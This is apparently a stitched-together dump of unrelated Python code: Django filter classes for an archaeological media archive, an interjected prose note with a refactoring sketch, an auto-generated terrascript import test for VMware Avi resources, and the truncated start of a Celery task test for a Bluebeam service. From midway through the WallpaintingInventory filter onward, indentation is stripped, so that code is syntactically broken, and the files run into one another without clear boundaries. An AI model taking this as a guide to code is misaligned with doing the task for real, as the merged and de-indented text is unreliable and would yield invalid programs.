            'creation_date_metadata',
            'excavation_object_id',
            'archaeological_object_id',
            'relatedto',
            'original_comment',
            'digitisation_comment',
            'document_type',
            'file_extension_original',
            'file_extension_archivalobject',
            'copyright',
            'access',
            'site_id',
            'excavation_post_excavation',
        ]

class VideosListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('legacy_id').help_text,
        label=Videos._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('fc_name').help_text,
        label=Videos._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('fc_directory').help_text,
        label=Videos._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('fc_type').help_text,
        label=Videos._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('fc_filename').help_text,
        label=Videos._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('fc_extension').help_text,
        label=Videos._meta.get_field('fc_extension').verbose_name
    )
    filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('filename').help_text,
        label=Videos._meta.get_field('filename').verbose_name
    )
    document_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('document_id').help_text,
        label=Videos._meta.get_field('document_id').verbose_name
    )
    document_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('document_title').help_text,
        label=Videos._meta.get_field('document_title').verbose_name
    )
    path_filename_old = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('path_filename_old').help_text,
        label=Videos._meta.get_field('path_filename_old').verbose_name
    )
    path_filename_arche = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('path_filename_arche').help_text,
        label=Videos._meta.get_field('path_filename_arche').verbose_name
    )
    original_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('original_comment').help_text,
        label=Videos._meta.get_field('original_comment').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Videos._meta.get_field('digitisation_comment').help_text,
        label=Videos._meta.get_field('digitisation_comment').verbose_name
    )
    file_extension_original = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension_original"
        ),
        help_text=Videos._meta.get_field('file_extension_original').help_text,
        label=Videos._meta.get_field('file_extension_original').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension_original",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension_archivalobject"
        ),
        help_text=Videos._meta.get_field('file_extension_archivalobject').help_text,
        label=Videos._meta.get_field('file_extension_archivalobject').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    copyright = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="copyright"
        ),
        help_text=Videos._meta.get_field('copyright').help_text,
        label=Videos._meta.get_field('copyright').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/copyright",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=Videos._meta.get_field('access').help_text,
        label=Videos._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=Videos._meta.get_field('site_id').help_text,
        label=Videos._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/site_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = Videos
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'creator_metadata',
            'creator_original',
            'creator_archivalobject',
            'document_type',
            'find_inventory_number',
            'filename',
            'document_id',
            'document_title',
            'creation_date_original',
            'creation_date_archivalobject',
            'creation_date_metadata',
            'path_filename_old',
            'path_filename_arche',
            'excavation_object_id',
            'archaeological_object_id',
            'original_comment',
            'digitisation_comment',
            'file_extension_original',
            'file_extension_archivalobject',
            'copyright',
            'access',
            'site_id',
        ]
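
# Usage sketch (hypothetical, not part of this module): each FilterSet above
# is typically wired into a django-filter FilterView, e.g.
#
#     from django_filters.views import FilterView
#
#     class VideosListView(FilterView):
#         model = Videos
#         filterset_class = VideosListFilter
#         template_name = 'archiv/videos_list.html'  # template name assumed
#
# GET parameters then map onto the declared filters: a request such as
# ?legacy_id=abc&site_id=42 combines the case-insensitive 'icontains'
# lookup on legacy_id with the generous_concept_filter method, which
# resolves the selected SkosConcept choices for site_id.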

class WallpaintingInventoryListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('legacy_id').help_text,
        label=WallpaintingInventory._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('fc_name').help_text,
        label=WallpaintingInventory._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('fc_directory').help_text,
        label=WallpaintingInventory._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('fc_type').help_text,
        label=WallpaintingInventory._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('fc_filename').help_text,
        label=WallpaintingInventory._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('fc_extension').help_text,
        label=WallpaintingInventory._meta.get_field('fc_extension').verbose_name
    )
    filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('filename').help_text,
        label=WallpaintingInventory._meta.get_field('filename').verbose_name
    )
    document_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('document_id').help_text,
        label=WallpaintingInventory._meta.get_field('document_id').verbose_name
    )
    document_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('document_title').help_text,
        label=WallpaintingInventory._meta.get_field('document_title').verbose_name
    )
    filename_old = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('filename_old').help_text,
        label=WallpaintingInventory._meta.get_field('filename_old').verbose_name
    )
    creation_year_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('creation_year_original').help_text,
        label=WallpaintingInventory._meta.get_field('creation_year_original').verbose_name
    )
    storage_folder_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('storage_folder_original').help_text,
        label=WallpaintingInventory._meta.get_field('storage_folder_original').verbose_name
    )
    fresco_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('fresco_inventory_number').help_text,
        label=WallpaintingInventory._meta.get_field('fresco_inventory_number').verbose_name
    )
    original_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('original_comment').help_text,
        label=WallpaintingInventory._meta.get_field('original_comment').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=WallpaintingInventory._meta.get_field('digitisation_comment').help_text,
        label=WallpaintingInventory._meta.get_field('digitisation_comment').verbose_name
    )
    file_extension = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension"
        ),
        help_text=WallpaintingInventory._meta.get_field('file_extension').help_text,
        label=WallpaintingInventory._meta.get_field('file_extension').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    copyright = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="copyright"
        ),
        help_text=WallpaintingInventory._meta.get_field('copyright').help_text,
        label=WallpaintingInventory._meta.get_field('copyright').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/copyright",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=WallpaintingInventory._meta.get_field('access').help_text,
        label=WallpaintingInventory._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=WallpaintingInventory._meta.get_field('site_id').help_text,
        label=WallpaintingInventory._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=WallpaintingInventory._meta.get_field('equipment_scan').help_text,
label=WallpaintingInventory._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=WallpaintingInventory._meta.get_field('source_original_copy_edited_copy').help_text,
label=WallpaintingInventory._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=WallpaintingInventory._meta.get_field('original_material').help_text,
label=WallpaintingInventory._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=WallpaintingInventory._meta.get_field('excavation_post_excavation').help_text,
label=WallpaintingInventory._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = WallpaintingInventory
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'document_type',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'storage_folder_original',
'resolution_scan_dpi',
'fresco_inventory_number',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
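The CharFilter declarations above repeat the same three-keyword pattern (`lookup_expr`, `help_text` from model metadata, `label` from the verbose name) for every text field. A sketch of how that boilerplate could be generated from a field list — using plain stand-in classes rather than the real `django_filters` and Django model APIs, which are assumed here and not imported:

```python
# Sketch only: FieldMeta and CharFilter are minimal stand-ins for the
# result of Model._meta.get_field(...) and django_filters.CharFilter.
from dataclasses import dataclass


@dataclass
class FieldMeta:
    help_text: str
    verbose_name: str


@dataclass
class CharFilter:
    lookup_expr: str
    help_text: str
    label: str


# Hypothetical metadata table standing in for WallpaintingInventory._meta.
META = {
    'filename': FieldMeta('Name of the file', 'Filename'),
    'document_id': FieldMeta('Identifier of the document', 'Document ID'),
}


def icontains_filter(field_name):
    """Build one case-insensitive 'contains' filter from field metadata."""
    meta = META[field_name]
    return CharFilter(
        lookup_expr='icontains',
        help_text=meta.help_text,
        label=meta.verbose_name,
    )


# Generate all text filters in one pass instead of one block per field.
filters = {name: icontains_filter(name) for name in META}
```

With the real libraries, the same dictionary could be attached to a FilterSet subclass instead of declaring each filter by hand.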
# tests/test_provider_vmware_avi.py  (mjuenema/python-terrascript, BSD-2-Clause)
# Automatically generated by tools/makecode.py (24-Sep-2021 15:12:08 UTC)
def test_provider_import():
import terrascript.provider.vmware.avi
def test_resource_import():
from terrascript.resource.vmware.avi import avi_actiongroupconfig
from terrascript.resource.vmware.avi import avi_albservicesconfig
from terrascript.resource.vmware.avi import avi_albservicesfileupload
from terrascript.resource.vmware.avi import avi_alertconfig
from terrascript.resource.vmware.avi import avi_alertemailconfig
from terrascript.resource.vmware.avi import avi_alertscriptconfig
from terrascript.resource.vmware.avi import avi_alertsyslogconfig
from terrascript.resource.vmware.avi import avi_analyticsprofile
from terrascript.resource.vmware.avi import avi_applicationpersistenceprofile
from terrascript.resource.vmware.avi import avi_applicationprofile
from terrascript.resource.vmware.avi import avi_authprofile
from terrascript.resource.vmware.avi import avi_autoscalelaunchconfig
from terrascript.resource.vmware.avi import avi_availabilityzone
from terrascript.resource.vmware.avi import avi_backup
from terrascript.resource.vmware.avi import avi_backupconfiguration
from terrascript.resource.vmware.avi import avi_botconfigconsolidator
from terrascript.resource.vmware.avi import avi_botdetectionpolicy
from terrascript.resource.vmware.avi import avi_botipreputationtypemapping
from terrascript.resource.vmware.avi import avi_botmapping
from terrascript.resource.vmware.avi import avi_certificatemanagementprofile
from terrascript.resource.vmware.avi import avi_cloud
from terrascript.resource.vmware.avi import avi_cloudconnectoruser
from terrascript.resource.vmware.avi import avi_cloudproperties
from terrascript.resource.vmware.avi import avi_cluster
from terrascript.resource.vmware.avi import avi_clusterclouddetails
from terrascript.resource.vmware.avi import avi_controllerportalregistration
from terrascript.resource.vmware.avi import avi_controllerproperties
from terrascript.resource.vmware.avi import avi_controllersite
from terrascript.resource.vmware.avi import avi_customipamdnsprofile
from terrascript.resource.vmware.avi import avi_dnspolicy
from terrascript.resource.vmware.avi import avi_dynamicdnsrecord
from terrascript.resource.vmware.avi import avi_errorpagebody
from terrascript.resource.vmware.avi import avi_errorpageprofile
from terrascript.resource.vmware.avi import avi_federationcheckpoint
from terrascript.resource.vmware.avi import avi_fileobject
from terrascript.resource.vmware.avi import avi_fileservice
from terrascript.resource.vmware.avi import avi_geodb
from terrascript.resource.vmware.avi import avi_gslb
from terrascript.resource.vmware.avi import avi_gslbgeodbprofile
from terrascript.resource.vmware.avi import avi_gslbservice
from terrascript.resource.vmware.avi import avi_hardwaresecuritymodulegroup
from terrascript.resource.vmware.avi import avi_healthmonitor
from terrascript.resource.vmware.avi import avi_httppolicyset
from terrascript.resource.vmware.avi import avi_icapprofile
from terrascript.resource.vmware.avi import avi_image
from terrascript.resource.vmware.avi import avi_inventoryfaultconfig
from terrascript.resource.vmware.avi import avi_ipaddrgroup
from terrascript.resource.vmware.avi import avi_ipamdnsproviderprofile
from terrascript.resource.vmware.avi import avi_ipreputationdb
from terrascript.resource.vmware.avi import avi_jwtserverprofile
from terrascript.resource.vmware.avi import avi_l4policyset
from terrascript.resource.vmware.avi import avi_labelgroup
from terrascript.resource.vmware.avi import avi_licenseledgerdetails
from terrascript.resource.vmware.avi import avi_memorybalancerrequest
from terrascript.resource.vmware.avi import avi_microservicegroup
from terrascript.resource.vmware.avi import avi_natpolicy
from terrascript.resource.vmware.avi import avi_network
from terrascript.resource.vmware.avi import avi_networkprofile
from terrascript.resource.vmware.avi import avi_networksecuritypolicy
from terrascript.resource.vmware.avi import avi_networkservice
from terrascript.resource.vmware.avi import avi_nsxtsegmentruntime
from terrascript.resource.vmware.avi import avi_pingaccessagent
from terrascript.resource.vmware.avi import avi_pkiprofile
from terrascript.resource.vmware.avi import avi_pool
from terrascript.resource.vmware.avi import avi_poolgroup
from terrascript.resource.vmware.avi import avi_poolgroupdeploymentpolicy
from terrascript.resource.vmware.avi import avi_prioritylabels
from terrascript.resource.vmware.avi import avi_protocolparser
from terrascript.resource.vmware.avi import avi_rmcloudopsproto
from terrascript.resource.vmware.avi import avi_role
from terrascript.resource.vmware.avi import avi_scheduler
from terrascript.resource.vmware.avi import avi_securitymanagerdata
from terrascript.resource.vmware.avi import avi_securitypolicy
from terrascript.resource.vmware.avi import avi_seproperties
from terrascript.resource.vmware.avi import avi_server
from terrascript.resource.vmware.avi import avi_serverautoscalepolicy
from terrascript.resource.vmware.avi import avi_serviceengine
from terrascript.resource.vmware.avi import avi_serviceenginegroup
from terrascript.resource.vmware.avi import avi_siteversion
from terrascript.resource.vmware.avi import avi_snmptrapprofile
from terrascript.resource.vmware.avi import avi_sslkeyandcertificate
from terrascript.resource.vmware.avi import avi_sslprofile
from terrascript.resource.vmware.avi import avi_ssopolicy
from terrascript.resource.vmware.avi import avi_stringgroup
from terrascript.resource.vmware.avi import avi_systemconfiguration
from terrascript.resource.vmware.avi import avi_systemlimits
from terrascript.resource.vmware.avi import avi_tenant
from terrascript.resource.vmware.avi import avi_testsedatastorelevel1
from terrascript.resource.vmware.avi import avi_testsedatastorelevel2
from terrascript.resource.vmware.avi import avi_testsedatastorelevel3
from terrascript.resource.vmware.avi import avi_trafficcloneprofile
from terrascript.resource.vmware.avi import avi_upgradestatusinfo
from terrascript.resource.vmware.avi import avi_upgradestatussummary
from terrascript.resource.vmware.avi import avi_user
from terrascript.resource.vmware.avi import avi_useraccount
from terrascript.resource.vmware.avi import avi_useraccountprofile
from terrascript.resource.vmware.avi import avi_vcenterserver
from terrascript.resource.vmware.avi import avi_virtualservice
from terrascript.resource.vmware.avi import avi_vrfcontext
from terrascript.resource.vmware.avi import avi_vsdatascriptset
from terrascript.resource.vmware.avi import avi_vsvip
from terrascript.resource.vmware.avi import avi_wafapplicationsignatureprovider
from terrascript.resource.vmware.avi import avi_wafcrs
from terrascript.resource.vmware.avi import avi_wafpolicy
from terrascript.resource.vmware.avi import avi_wafpolicypsmgroup
from terrascript.resource.vmware.avi import avi_wafprofile
from terrascript.resource.vmware.avi import avi_webhook
def test_datasource_import():
from terrascript.data.vmware.avi import avi_actiongroupconfig
from terrascript.data.vmware.avi import avi_albservicesconfig
from terrascript.data.vmware.avi import avi_albservicesfileupload
from terrascript.data.vmware.avi import avi_alertconfig
from terrascript.data.vmware.avi import avi_alertemailconfig
from terrascript.data.vmware.avi import avi_alertscriptconfig
from terrascript.data.vmware.avi import avi_alertsyslogconfig
from terrascript.data.vmware.avi import avi_analyticsprofile
from terrascript.data.vmware.avi import avi_applicationpersistenceprofile
from terrascript.data.vmware.avi import avi_applicationprofile
from terrascript.data.vmware.avi import avi_authprofile
from terrascript.data.vmware.avi import avi_autoscalelaunchconfig
from terrascript.data.vmware.avi import avi_availabilityzone
from terrascript.data.vmware.avi import avi_backup
from terrascript.data.vmware.avi import avi_backupconfiguration
from terrascript.data.vmware.avi import avi_botconfigconsolidator
from terrascript.data.vmware.avi import avi_botdetectionpolicy
from terrascript.data.vmware.avi import avi_botipreputationtypemapping
from terrascript.data.vmware.avi import avi_botmapping
from terrascript.data.vmware.avi import avi_certificatemanagementprofile
from terrascript.data.vmware.avi import avi_cloud
from terrascript.data.vmware.avi import avi_cloudconnectoruser
from terrascript.data.vmware.avi import avi_cloudproperties
from terrascript.data.vmware.avi import avi_cluster
from terrascript.data.vmware.avi import avi_clusterclouddetails
from terrascript.data.vmware.avi import avi_controllerportalregistration
from terrascript.data.vmware.avi import avi_controllerproperties
from terrascript.data.vmware.avi import avi_controllersite
from terrascript.data.vmware.avi import avi_customipamdnsprofile
from terrascript.data.vmware.avi import avi_dnspolicy
from terrascript.data.vmware.avi import avi_dynamicdnsrecord
from terrascript.data.vmware.avi import avi_errorpagebody
from terrascript.data.vmware.avi import avi_errorpageprofile
from terrascript.data.vmware.avi import avi_federationcheckpoint
from terrascript.data.vmware.avi import avi_fileobject
from terrascript.data.vmware.avi import avi_fileservice
from terrascript.data.vmware.avi import avi_geodb
from terrascript.data.vmware.avi import avi_gslb
from terrascript.data.vmware.avi import avi_gslbgeodbprofile
from terrascript.data.vmware.avi import avi_gslbservice
from terrascript.data.vmware.avi import avi_hardwaresecuritymodulegroup
from terrascript.data.vmware.avi import avi_healthmonitor
from terrascript.data.vmware.avi import avi_httppolicyset
from terrascript.data.vmware.avi import avi_icapprofile
from terrascript.data.vmware.avi import avi_image
from terrascript.data.vmware.avi import avi_inventoryfaultconfig
from terrascript.data.vmware.avi import avi_ipaddrgroup
from terrascript.data.vmware.avi import avi_ipamdnsproviderprofile
from terrascript.data.vmware.avi import avi_ipreputationdb
from terrascript.data.vmware.avi import avi_jwtserverprofile
from terrascript.data.vmware.avi import avi_l4policyset
from terrascript.data.vmware.avi import avi_labelgroup
from terrascript.data.vmware.avi import avi_licenseledgerdetails
from terrascript.data.vmware.avi import avi_memorybalancerrequest
from terrascript.data.vmware.avi import avi_microservicegroup
from terrascript.data.vmware.avi import avi_natpolicy
from terrascript.data.vmware.avi import avi_network
from terrascript.data.vmware.avi import avi_networkprofile
from terrascript.data.vmware.avi import avi_networksecuritypolicy
from terrascript.data.vmware.avi import avi_networkservice
from terrascript.data.vmware.avi import avi_nsxtsegmentruntime
from terrascript.data.vmware.avi import avi_pingaccessagent
from terrascript.data.vmware.avi import avi_pkiprofile
from terrascript.data.vmware.avi import avi_pool
from terrascript.data.vmware.avi import avi_poolgroup
from terrascript.data.vmware.avi import avi_poolgroupdeploymentpolicy
from terrascript.data.vmware.avi import avi_prioritylabels
from terrascript.data.vmware.avi import avi_protocolparser
from terrascript.data.vmware.avi import avi_rmcloudopsproto
from terrascript.data.vmware.avi import avi_role
from terrascript.data.vmware.avi import avi_scheduler
from terrascript.data.vmware.avi import avi_securitymanagerdata
from terrascript.data.vmware.avi import avi_securitypolicy
from terrascript.data.vmware.avi import avi_seproperties
from terrascript.data.vmware.avi import avi_server
from terrascript.data.vmware.avi import avi_serverautoscalepolicy
from terrascript.data.vmware.avi import avi_serviceengine
from terrascript.data.vmware.avi import avi_serviceenginegroup
from terrascript.data.vmware.avi import avi_siteversion
from terrascript.data.vmware.avi import avi_snmptrapprofile
from terrascript.data.vmware.avi import avi_sslkeyandcertificate
from terrascript.data.vmware.avi import avi_sslprofile
from terrascript.data.vmware.avi import avi_ssopolicy
from terrascript.data.vmware.avi import avi_stringgroup
from terrascript.data.vmware.avi import avi_systemconfiguration
from terrascript.data.vmware.avi import avi_systemlimits
from terrascript.data.vmware.avi import avi_tenant
from terrascript.data.vmware.avi import avi_testsedatastorelevel1
from terrascript.data.vmware.avi import avi_testsedatastorelevel2
from terrascript.data.vmware.avi import avi_testsedatastorelevel3
from terrascript.data.vmware.avi import avi_trafficcloneprofile
from terrascript.data.vmware.avi import avi_upgradestatusinfo
from terrascript.data.vmware.avi import avi_upgradestatussummary
from terrascript.data.vmware.avi import avi_user
from terrascript.data.vmware.avi import avi_useraccountprofile
from terrascript.data.vmware.avi import avi_vcenterserver
from terrascript.data.vmware.avi import avi_virtualservice
from terrascript.data.vmware.avi import avi_vrfcontext
from terrascript.data.vmware.avi import avi_vsdatascriptset
from terrascript.data.vmware.avi import avi_vsvip
from terrascript.data.vmware.avi import avi_wafapplicationsignatureprovider
from terrascript.data.vmware.avi import avi_wafcrs
from terrascript.data.vmware.avi import avi_wafpolicy
from terrascript.data.vmware.avi import avi_wafpolicypsmgroup
from terrascript.data.vmware.avi import avi_wafprofile
from terrascript.data.vmware.avi import avi_webhook
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.vmware.avi
#
# t = terrascript.provider.vmware.avi.avi()
# s = str(t)
#
# assert 'https://github.com/vmware/terraform-provider-avi' in s
# assert '21.1.1' in s
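The generated per-name import statements above amount to a smoke test that every expected symbol is importable. The same check can be expressed as one loop with `importlib`; the module and attribute names below are stdlib stand-ins, since `terrascript` itself is an assumption and is not imported here:

```python
import importlib


def check_imports(module_name, attr_names):
    """Import a module once and report any expected attributes it lacks."""
    module = importlib.import_module(module_name)
    return [name for name in attr_names if not hasattr(module, name)]


# Stand-in for e.g. ('terrascript.resource.vmware.avi', ['avi_cloud', ...]).
missing = check_imports('json', ['dumps', 'loads'])
```

A table of `(module, [names])` pairs plus this helper would replace several hundred generated lines while failing with the same information.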
# tests/test_tasks.py  (SFDigitalServices/bluebeam-microservice, MIT)
""" tests for tasks """
#pylint: disable=too-many-statements,line-too-long,too-many-lines
import os
import datetime
import copy
from unittest.mock import patch, Mock
import pytest
import tests.mocks as mocks
import tests.utils as test_utils
import service.resources.bluebeam as bluebeam
from service.resources.models import create_export, create_submission
from service.resources.db import create_session
from tasks import celery_app as queue, bluebeam_export
session = create_session() # pylint: disable=invalid-name
db = session() # pylint: disable=invalid-name
ZIP_FILE = 'tests/resources/Archive.zip'
TEST_PDF = 'tests/resources/dummy.pdf'
@pytest.fixture(scope='session')
def celery_config():
""" config for celery worker """
return {
'broker_url': os.environ['REDIS_URL'],
'task_serializer': 'pickle',
'accept_content': ['pickle', 'application/x-python-serialize', 'json', 'application/json']
}
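The fixture above opts into Celery's pickle serializer, which — unlike JSON — can round-trip arbitrary Python objects passed as task arguments. A minimal stdlib illustration of that difference (Celery itself is not imported here; the UUID stands in for an export GUID):

```python
import json
import pickle
import uuid

task_args = {'export_id': uuid.uuid4()}  # a UUID, as used for export GUIDs

# JSON cannot serialize a UUID directly...
try:
    json.dumps(task_args)
    json_ok = True
except TypeError:
    json_ok = False

# ...while pickle round-trips it unchanged.
restored = pickle.loads(pickle.dumps(task_args))
```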
def test_export_task_new_project_no_files(mock_env_access_key):
# pylint: disable=unused-argument
"""Test create a new project with no files"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(
db,
{i:mocks.SUBMISSION_POST_DATA[i] for i in mocks.SUBMISSION_POST_DATA if i != 'files'},
export_obj.guid
)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# add user
fake_post_responses.extend(test_utils.mock_add_users_response())
mock_post.side_effect = fake_post_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
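Each test builds a `fake_post_responses` list and assigns it to `mock_post.side_effect`, so successive HTTP calls consume successive entries. A self-contained sketch of that `unittest.mock` behavior, including how an exception instance placed in the list is raised instead of returned:

```python
from unittest.mock import Mock

request = Mock()
ok = Mock()
ok.json.return_value = {'Id': 123}  # mimics a parsed API response
request.side_effect = [ok, ConnectionError('upload failed')]

first = request('POST', '/projects')   # first call returns the first entry
assert first.json() == {'Id': 123}

try:
    request('POST', '/files')          # second call raises the exception entry
    raised = False
except ConnectionError:
    raised = True
```

This is why the tests can simulate a mid-export failure simply by replacing one list element with an `Exception`.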
def test_export_task_new_project_bucketeer(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
